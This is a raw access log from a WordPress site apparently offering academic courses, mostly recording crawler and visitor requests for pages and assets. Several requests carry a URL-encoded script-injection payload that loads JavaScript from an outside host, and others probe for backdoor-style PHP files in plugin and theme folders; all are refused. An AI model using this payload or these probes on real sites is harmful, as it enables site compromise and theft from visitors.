54.36.148.128 - - [02/May/2025:20:06:47 +0330] "GET /category-sitemap.xml HTTP/2" 200 419 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.58 - - [02/May/2025:20:13:16 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.5.0 HTTP/2" 200 5290 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.85 - - [02/May/2025:20:13:21 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/modules/motion-fx.min.css?ver=3.28.3 HTTP/2" 200 210 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.125 - - [02/May/2025:20:13:28 +0330] "GET /wp-content/uploads/elementor/css/post-55.css?ver=1745850395 HTTP/2" 200 1712 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.154 - - [02/May/2025:20:13:31 +0330] "GET /wp-content/uploads/elementor/css/post-34.css?ver=1745850393 HTTP/2" 200 811 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.68 - - [02/May/2025:20:13:32 +0330] "GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.28.4 HTTP/2" 200 2228 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.121 - - [02/May/2025:20:13:45 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/style.css?ver=2.13.9 HTTP/2" 200 706 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.200 - - [02/May/2025:20:13:49 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/widget-share-buttons-rtl.min.css?ver=3.28.3 HTTP/2" 200 2110 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.175 - - [02/May/2025:20:14:05 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/widget-form-rtl.min.css?ver=3.28.3 HTTP/2" 200 1409 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.223 - - [02/May/2025:20:14:13 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/widget-scripts.js?ver=3.5.0 HTTP/2" 200 40425 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.140 - - [02/May/2025:20:14:19 +0330] "GET /wp-content/uploads/elementor/css/post-26457.css?ver=1745850396 HTTP/2" 200 1000 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
31.214.174.196 - - [02/May/2025:20:14:51 +0330] "POST /wp-cron.php?doing_wp_cron=1746204291.3759219646453857421875 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
54.36.148.118 - - [02/May/2025:20:15:15 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3 HTTP/2" 200 286 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.4 - - [02/May/2025:20:16:00 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=3.5.0 HTTP/2" 200 2859 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
138.246.253.24 - - [02/May/2025:20:06:55 +0330] "GET /robots.txt HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
54.36.149.63 - - [02/May/2025:20:12:40 +0330] "GET /courses/fundamental-of-robust-stochastic-optimization-under-uncertainty/ HTTP/2" 200 77243 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.79 - - [02/May/2025:20:13:54 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/js/view/general.min.js?ver=6.1.11 HTTP/2" 200 3883 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.111 - - [02/May/2025:20:13:58 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-social-icons-rtl.min.css?ver=3.28.4 HTTP/2" 200 1069 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.0 - - [02/May/2025:20:14:25 +0330] "GET /wp-content/uploads/elementor/css/post-28744.css?ver=1745850429 HTTP/2" 200 1089 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
62.113.113.162 - - [02/May/2025:20:14:49 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
54.36.148.9 - - [02/May/2025:20:15:20 +0330] "GET /wp-content/uploads/2021/01/Ali-Papi.jpg HTTP/2" 200 39828 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
94.102.49.19 - - [02/May/2025:20:15:51 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
54.36.148.7 - - [02/May/2025:20:16:07 +0330] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-bounce-in.min.css?ver=3.28.4 HTTP/2" 200 124 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.23 - - [02/May/2025:20:16:12 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.28.4 HTTP/2" 200 4042 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.61 - - [02/May/2025:20:16:13 +0330] "GET /wp-content/uploads/2020/06/Artboard-1.png HTTP/2" 200 101202 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.50 - - [02/May/2025:20:16:15 +0330] "GET /wp-content/uploads/2025/03/11.jpg HTTP/2" 200 2057078 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.42 - - [02/May/2025:20:16:24 +0330] "GET /wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.18 HTTP/2" 200 5286 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.233 - - [02/May/2025:20:16:40 +0330] "GET /wp-content/uploads/2022/03/Untitled-1-1-150x150.png HTTP/2" 200 18579 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
94.102.49.19 - - [02/May/2025:20:16:44 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
54.36.148.130 - - [02/May/2025:20:16:48 +0330] "GET /wp-content/uploads/2022/08/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%AF%D9%85%D8%B2-1-1024x396.png HTTP/2" 200 294972 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.31 - - [02/May/2025:20:16:31 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.28.3 HTTP/2" 200 6279 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.178 - - [02/May/2025:20:17:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-pop.min.css?ver=3.28.4 HTTP/2" 200 130 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.18 - - [02/May/2025:20:17:39 +0330] "GET /wp-content/plugins/jet-tabs/assets/css/jet-tabs-frontend.css?ver=2.2.8 HTTP/2" 200 3769 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
94.102.49.19 - - [02/May/2025:20:21:21 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
18.97.9.97 - - [02/May/2025:20:27:19 +0330] "GET /robots.txt HTTP/1.1" 200 170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot)"
18.97.9.96 - - [02/May/2025:20:27:19 +0330] "GET /courses/mssp-mlro-14010510/ HTTP/1.1" 200 50052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot)"
31.214.174.196 - - [02/May/2025:20:27:20 +0330] "POST /?wordfence_syncAttackData=1746205040.7187 HTTP/1.1" 200 11138 "-" "WordPress/6.8.1; https://optimyar.com"
54.36.148.52 - - [02/May/2025:20:17:00 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.1.11 HTTP/2" 200 1365 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.61 - - [02/May/2025:20:17:31 +0330] "GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.28.3 HTTP/2" 200 1442 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.211 - - [02/May/2025:20:17:53 +0330] "GET /wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=3.5.0 HTTP/2" 200 11776 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
31.214.174.196 - - [02/May/2025:20:27:22 +0330] "POST /wp-cron.php?doing_wp_cron=1746205042.3643770217895507812500 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:20:27:20 +0330] "POST /?wordfence_syncAttackData=1746205040.652 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:20:29:45 +0330] "POST /?wordfence_syncAttackData=1746205185.6439 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
43.166.142.76 - - [02/May/2025:20:29:44 +0330] "GET / HTTP/1.1" 200 32579 "http://optimyar.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
31.214.174.196 - - [02/May/2025:20:33:12 +0330] "POST /wp-cron.php?doing_wp_cron=1746205392.7316169738769531250000 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
91.142.73.116 - - [02/May/2025:20:33:11 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:20:40:20 +0330] "POST /wp-cron.php?doing_wp_cron=1746205820.1749489307403564453125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
54.147.238.89 - - [02/May/2025:20:40:18 +0330] "GET /courses/gtblp-la/ HTTP/1.1" 200 37488 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.64.128 - - [02/May/2025:20:51:18 +0330] "GET /wp-content/uploads/elementor/css/custom-jet-blocks-rtl.css?ver=1.3.18 HTTP/1.1" 200 5344 "https://optimyar.com/elementskit-content/dynamic-content-widget-popup-20d7cea/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.132 - - [02/May/2025:20:51:18 +0330] "GET /wp-content/uploads/elementor/css/post-19982.css?ver=1744416000 HTTP/1.1" 200 1328 "https://optimyar.com/elementskit-content/dynamic-content-widget-popup-20d7cea/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.128 - - [02/May/2025:20:51:18 +0330] "GET /wp-content/uploads/elementor/css/post-19974.css?ver=1744416000 HTTP/1.1" 200 580 "https://optimyar.com/elementskit-content/dynamic-content-widget-popup-20d7cea/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.128 - - [02/May/2025:20:51:18 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/form.5fb35271b8ba3fb1e7d6.bundle.min.js HTTP/1.1" 200 4961 "https://optimyar.com/elementskit-content/dynamic-content-widget-popup-20d7cea/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.128 - - [02/May/2025:20:51:19 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/popup.f7b15b2ca565b152bf98.bundle.min.js HTTP/1.1" 200 394 "https://optimyar.com/elementskit-content/dynamic-content-widget-popup-20d7cea/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.61.161.124 - - [02/May/2025:21:01:32 +0330] "GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.1" 404 15368 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.61.161.124 - - [02/May/2025:21:01:55 +0330] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 15368 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
31.214.174.196 - - [02/May/2025:21:02:22 +0330] "POST /wp-cron.php?doing_wp_cron=1746207142.8004848957061767578125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
66.249.64.129 - - [02/May/2025:20:51:13 +0330] "GET /elementskit-content/dynamic-content-widget-popup-20d7cea/ HTTP/1.1" 200 15632 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.95 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.132 - - [02/May/2025:20:51:18 +0330] "GET /wp-content/uploads/elementor/css/post-19746.css?ver=1744416000 HTTP/1.1" 200 178 "https://optimyar.com/elementskit-content/dynamic-content-widget-popup-20d7cea/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.178.140.152 - - [02/May/2025:20:57:02 +0330] "GET /robots.txt HTTP/2" 200 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
31.214.174.196 - - [02/May/2025:20:57:03 +0330] "POST /?wordfence_syncAttackData=1746206823.3001 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
172.178.140.152 - - [02/May/2025:20:57:05 +0330] "GET /courses/mssp-mlro-14010510/ HTTP/2" 200 50052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
45.61.161.124 - - [02/May/2025:21:01:44 +0330] "GET /wp-content/themes/hello_dolly_v2.php HTTP/1.1" 404 15368 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.61.161.124 - - [02/May/2025:21:02:21 +0330] "GET /wp-content/themes/include.php HTTP/1.1" 404 15368 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
94.102.49.19 - - [02/May/2025:21:06:45 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:21:06:55 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
31.214.174.196 - - [02/May/2025:21:11:57 +0330] "POST /wp-cron.php?doing_wp_cron=1746207717.0873529911041259765625 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:21:17:06 +0330] "POST /?wordfence_syncAttackData=1746208026.6752 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
66.249.64.129 - - [02/May/2025:21:17:05 +0330] "GET /academic-co-working/ HTTP/1.1" 200 22165 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.132 - - [02/May/2025:21:17:05 +0330] "GET /academic-co-working/ HTTP/1.1" 200 22166 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.214.174.196 - - [02/May/2025:21:17:06 +0330] "POST /?wordfence_syncAttackData=1746208026.6286 HTTP/1.1" 200 11138 "-" "WordPress/6.8.1; https://optimyar.com"
66.249.64.128 - - [02/May/2025:21:17:11 +0330] "GET /wp-content/uploads/elementor/css/post-26307.css?ver=1744416000 HTTP/1.1" 200 1450 "https://optimyar.com/academic-co-working/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/elementor/css/post-35491.css?ver=1745868869 HTTP/2" 200 3671 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/style.css?ver=2.13.9 HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/elementor/css/custom-jet-blocks-rtl.css?ver=1.3.18 HTTP/2" 200 5344 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.36.0 HTTP/2" 200 3845 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9 HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/jet-tabs/assets/css/jet-tabs-frontend.css?ver=2.2.8 HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor-extras/assets/lib/nicons/css/nicons.css?ver=2.2.52 HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor-extras/assets/css/frontend-rtl.min.css?ver=2.2.52 HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3 HTTP/2" 200 12164 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3 HTTP/2" 200 286 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3 HTTP/2" 200 284 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.15.3 HTTP/2" 200 283 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/elementor/custom-icons/myic4/css/myic4.css?ver=1.0.0 HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/2020/06/Artboard-1.png HTTP/2" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:18 +0330] "GET /courses/stochastic-programming/ HTTP/2" 200 77012 "-" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/2021/01/Ali-Papi.jpg HTTP/1.1" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Bold.woff2 HTTP/1.1" 304 0 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-DemiBold.woff2 HTTP/1.1" 304 0 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Gandom/Gandom.woff2 HTTP/1.1" 304 0 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/2022/03/Untitled-1-1.png HTTP/1.1" 304 0 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-18728.css?ver=1741441199 HTTP/1.1" 200 1753 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-18728.js?ver=1741441199 HTTP/1.1" 200 974 "https://optimyar.com/courses/stochastic-programming/" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Parastoo/Parastoo-Bold.woff2 HTTP/1.1" 304 0 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
192.15.50.195 - - [02/May/2025:21:21:23 +0330] "GET /wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.36.0 HTTP/1.1" 200 99440 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.36.0" "Mozilla/5.0 (Linux; Android 14; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
